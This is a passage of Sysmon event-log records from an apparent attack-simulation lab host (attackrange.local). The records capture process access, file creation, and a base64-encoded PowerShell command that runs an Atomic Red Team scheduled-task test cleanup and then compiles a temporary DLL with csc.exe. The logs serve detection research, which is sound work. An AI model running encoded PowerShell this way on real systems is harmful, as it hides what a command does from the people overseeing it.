C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001058C20800}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001058C20800}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:21.932\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nProcessId: 1092\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.dll\r\nCreationUtcTime: 2020-08-01 06:55:21.932","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:21.932","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.dll","CreationUtcTime":"2020-08-01 06:55:21.932","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nProcessId: 1092\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:21.932","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.cmdline","CreationUtcTime":"2020-08-01 06:55:21.932","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.947\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-00106BC50800}\r\nProcessId: 4292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.947","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-00106BC50800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","ParentProcessId":"1092","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+444e1900(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+444e1900(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f7824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+444e1900(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+444e1900(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f7824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 